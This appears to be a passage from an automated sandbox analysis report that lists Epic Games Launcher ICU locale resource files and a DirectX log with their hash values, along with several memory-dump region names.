| MD5 | f290c99a3e9c928023e949819dfe38ee |
| SHA1 | e24ac7970af336c9455b5211bf1b865237d46e05 |
| SHA256 | 6dd348d1795c7e999a650b6cbf254544f9d62ebe48f53230334bc0d6fa44d47d |
| SHA512 | 873c23e1aea6243172bd8f8efa2cb1ed8580e1def84764cc05a3638118d4c01f17f8f51967dc050c903727cb1784c4ea01d274a45c4969d9fe1e7efb881a0379 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\fr_SY.res
| MD5 | 4cf3aa31b641864ab60ef738b2b9903a |
| SHA1 | 92db1cf0b23b8d187b404b1693c3841f16152bda |
| SHA256 | 4d2bbe1d4d9d0a4266448241596bca9da40a34d96e4fd309a205350156de0134 |
| SHA512 | e7e01ab79ce30f51b69b1c7094c325d55e08da3703c05ed0741b05d30b2c4d662587338141aa5bf6ee9015ce1dff2094982a40ba58f4abca7cf3e8c1a954e2ec |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\ar_BH.res
| MD5 | ae6774ad1b4e487d0992d22700f9087f |
| SHA1 | 46b5c49c76a7106f33bfa9bb13ec5b0f50eff50b |
| SHA256 | dc359b3a630dab0a5b4e728806547747fc25105b70abd3b22e8bff20a3995ef5 |
| SHA512 | 095b725d6f78b78a8f77dfa461b716a480219a969efc8246045bc0b93a18ba1377bc17bf4ff99b390038db71db3a387c4b6c658f858b735a897d41ce6c34ce79 |
memory/6928-3950-0x00000207B7440000-0x00000207B7460000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\pt_TL.res
| MD5 | 606dd5e86352cba8a2a4f4561837824b |
| SHA1 | 5c0059f5cbdd887fb652fa79ad87aac0f8865ea8 |
| SHA256 | 3a85bade8a7a6db69c28c9388ef247294248df06f9d9d406198479426b31d70c |
| SHA512 | 66c908320950530c345997b522e12d7d6603df931fe32b43644a2ddfa12be7795c9582c070adb744fbde9df287816fc8584f5f1a2bc2158abd8bfc9ba4b20e0c |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\vai_Vaii.res
| MD5 | a60e02569784ac9d5c76e3021322c822 |
| SHA1 | 471960a6448f26bf0216f28f071e3860f1d6a271 |
| SHA256 | 338496ad90df4581131f024dd945f5d7455f0b9969ea0c924e9f1bc142083b18 |
| SHA512 | a2d57f8efbe4e5d0b50faf54c6c44ceecf0ade4577872af3cace9df64d1733a68325494694b03e3517877560bf12cc124f662aaddf8c1f68b97862e75fc0cef2 |
memory/6928-4019-0x00000207B7800000-0x00000207B7820000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\sr_Cyrl.res
| MD5 | 85a6974221a7807b04c9e016b6c8904c |
| SHA1 | 421c17e072a104975c29e5c4a51575c5a9542489 |
| SHA256 | 939c1da1c4ed3e97227cfc94d46bacdfbbb8d2bff721ec42618b641db731ad3d |
| SHA512 | eadbc62801b0d5aba4b9a2bbdf469f007493fe613e04b640aa511383a4e3d707ac0adcff3e5d80f1598090e12cd65c5985dfcdf0cf8d46af807bad00204182cc |
memory/6928-3992-0x00000207B7400000-0x00000207B7420000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\sr_YU.res
| MD5 | 88ca5d2b5f3baa53f32d1a17affb3cc4 |
| SHA1 | b603ef247d2e23125e79c34f3695b44853a2024e |
| SHA256 | 413c50ef83d5a3ff6c6f693e50594ff033a0301dcb807c2ad1efdeb25fcb7642 |
| SHA512 | be26d85b7ea633275de857127a7e8891fe0bd1eb66ba33e83ee6b652a76c0618bf052da6a43fb9e21394941732d9805dc2fb801a5065b7ee8cda6ea77ff3914d |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\rwk.res
| MD5 | 2dc65410add51f24840be253b3de1e6a |
| SHA1 | 555d4e6eb7c777e657dc6fa511950b6a31426ba1 |
| SHA256 | e8647fd90a97c6c221deabe0e4e4f833e3b726c9424091695e2419045d7f2b60 |
| SHA512 | 01bec81c93895a11fdb507bcfe01386d0d590e20827aad4ab59ce50e25de3074801996fd2b3ac9d8231af80049dc5ecaab8e3ad38ae8fd9b4135706cdc53f60f |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\pa_Arab.res
| MD5 | 6a9273af56e5d1f6f2d24203334ddf9b |
| SHA1 | bd7ca1cb1ba90b6036803043b8e351e6ec499da5 |
| SHA256 | f1d94fcb430e36370fa030c9d9892214dcb624289bc5282d432bf2a49378a08c |
| SHA512 | 066cc289321c632ca0657aac15f9f0e121c506b3ebd752e19277a5087417430e3c40525e0b410b930ef3a238328906aa64bf2a53b0febb26724918333c500508 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\pa_Guru.res
| MD5 | 7b02e28612fbff1a60da141244aef706 |
| SHA1 | 78065b63c9d24feaa1f72752a39d3977449bce1e |
| SHA256 | 15b23903878e867c7f8638b46048ffcbb245789c344bc16986851a7227687909 |
| SHA512 | ea8c726496990c7fd4958181650b21b89fce23c5250e76bfc3b7d23acf827196791c312f96ff71d5fd0f90b03603646c26b3b31232d6fa2630492c4a315552f5 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\vai_Vaii.res
| MD5 | a0838e6d15b5072dc03baeb7f98ed41a |
| SHA1 | 98ab23737463e55ada302d75545a9bb32be19272 |
| SHA256 | 825e5f4187683fe01e0fff595d7cb7cab8654c5699f0d8386e6c3625a5e3b19f |
| SHA512 | b4f64fa488f5af2465e5f986c7b505df49c23166c022e13dbe764047833735551f67c2f3dacdfff46a30847e8303df96270471f990ac48353e6a5baacafc3d2a |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\lang\sr_Cyrl.res
| MD5 | c2d04d672f4df81cff4bceead9be3750 |
| SHA1 | 21413dc219200658c148c7adc2a3c47e7d4c3ffd |
| SHA256 | ddd8f7540d9a540ea6967bf394fddaf7262d47fd2484d4467cb4d2c747b6dd32 |
| SHA512 | 6a15d00e02638fae576327c856aa81a476fb76621febf62bf1160d6afd8fd7e5ceaf12fe7cce072bb45e0d371ed5be67b3059a19a45f0e7d452564475d69b598 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\sr_Cyrl_YU.res
| MD5 | 5c56677a0822b6f922124f4e4ae5a625 |
| SHA1 | d1a78f3f6f949ca8c8593dfd24a8c248642bbf38 |
| SHA256 | 7d0e61f3ca3dae5bb75aaf6318bde4f128da9662fe1d75fc245f5d4b5e4188ce |
| SHA512 | 0090c31c35af1b6718f4db3fe7aa2e6f06240b7895df417ff9500e08c66a9f9d98095378558131c2d96ea129fdc7df30be876f4b18b887872b0addfa9c3a59a8 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\lang\sr_RS.res
| MD5 | 522cc1a65a354bc4ac2119c3ee5177e2 |
| SHA1 | 5ff152aa8dec7e82399d07d29d1dc12be874f985 |
| SHA256 | fd32948fd9cec6e575bb7e29a4102cdbf852ec752cf47399a028d04528c489b3 |
| SHA512 | e95d63da5e61069be80017cbd7be335ec4a80d44a1acf9638c697b13817a832d8bfa7afcb562f3d9c36df13de27366c78ba0866bb9e463f5af455ae0983e385e |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\zone\sr_Cyrl_YU.res
| MD5 | 7a74fc755d1e0d6d48cd5b4c2361592b |
| SHA1 | f35ee9e8b2b8ad42d48265ab5f32617b664a77fe |
| SHA256 | 028a167d99b424b29176736eafd35631bacf7a4f087e765c6e244cef0d12203e |
| SHA512 | be38f81fe8d53b9fa2adad5d2b403dae7e6223f6aa4438f5ddd5c3be3b88795a720e90197a96263dc8251abc10f96a7c5e987dbea84a00cb88f60394278f54f6 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\sr_CS.res
| MD5 | 03b4c2777b2ab020f0301b1f57b4486c |
| SHA1 | 1a8fe984f91940e6a8b86f9433bc64ce5d875b87 |
| SHA256 | 2001732718d567eddb29306e39fe186be95cd30bea89a14a5cffda73c6e95539 |
| SHA512 | d7ff5c4032bb90e9123b3054783ded9abac3b1413da8e01f80bfcf0a07169ce7992b89454c839b3f5d1d4633b5ade2ab093a68e9ff09aa825e9303c371929859 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\sr_YU.res
| MD5 | a1a03e4ae0bb3120daa7f925f9754736 |
| SHA1 | 244855f29a028c974b0e908cd8e4cee11f65e56c |
| SHA256 | fd67c6594b5413b30f3d04973480904ec2179107b767666c37a8a55c90918ea6 |
| SHA512 | 04c5b3ffb40b64422f94929e0181879cb7de1e8d07d5b2c59aca1e5e88a33503ba3a6e377c064c5675d0522c49f6853bd28e5141b9227846336f2686d551e987 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\uz_Latn.res
| MD5 | 1960ad3959332481f6d916f056b52339 |
| SHA1 | cea9c67afc66f20e4104cb6aa2df781bccadfd5a |
| SHA256 | dcb5a6234f2f38bece4039140f59ea549c5cef8191cda68fdae9d5b6106d9b4f |
| SHA512 | c7be9fb55877d5418afb221f94f131e02a2c88c55216e2a1b9967b3dde70b47336d8878b97cb64228a7ddda55dc4665517f1f8e8df2b997e2895afe62f9a3986 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\zone\zh_Hans.res
| MD5 | cbf1e43602d294e22f60cdefffbe1133 |
| SHA1 | e9b337c3ee0c3fe63b741faa70a51fb5a8475970 |
| SHA256 | 968f1197df1b8b6f2ff8113b28253086818ea2c8e21c049509dc10d50adeb7f8 |
| SHA512 | 66979d342beba1c32521f3797499c19fa3895e8efe74ae6e50caac65aa72b282180bb3be55ad6b4a479c393e992f88f0f12b4d2b5429fefd5681076d519041eb |
memory/6928-5074-0x000001FFB4600000-0x000001FFB5F2F000-memory.dmp
C:\Windows\Logs\DirectX.log
| MD5 | 8fb341dc2c9b462e9055aadc89bd9a1e |
| SHA1 | 8e80b7c0b2b50138edb4f70d516d66130cac433e |
| SHA256 | 280bc380746718a0b42b30c37808825bdd50024681fb5e45ece33856c619efcb |
| SHA512 | 12324297c31e4c6a622e542dc89e262e09691401ff0bc1544cc3832b80a8adf68e8b0d790e4aed3b227ca96f9448b32d49f97a0020db354142fc08faae12dc9b |
memory/4928-5312-0x000001EB99320000-0x000001EB99340000-memory.dmp
memory/4928-5314-0x000001EB992E0000-0x000001EB99300000-memory.dmp
memory/4928-5316-0x000001EB99900000-0x000001EB99920000-memory.dmp